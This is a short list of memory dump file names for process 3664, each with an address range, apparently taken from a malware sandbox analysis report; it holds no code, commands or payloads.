memory/3664-86-0x0000000005B40000-0x00000000060E4000-memory.dmp

memory/3664-87-0x0000000005590000-0x000000000562C000-memory.dmp

memory/3664-88-0x0000000005880000-0x0000000005890000-memory.dmp

memory/3664-89-0x0000000074610000-0x0000000074DC0000-memory.dmp

memory/3664-90-0x0000000005880000-0x0000000005890000-memory.dmp

memory/3664-91-0x00000000068F0000-0x0000000006940000-memory.dmp

memory/3664-92-0x0000000006B10000-0x0000000006CD2000-memory.dmp

memory/3664-93-0x00000000069E0000-0x0000000006A72000-memory.dmp

memory/3664-94-0x0000000006970000-0x000000000697A000-memory.dmp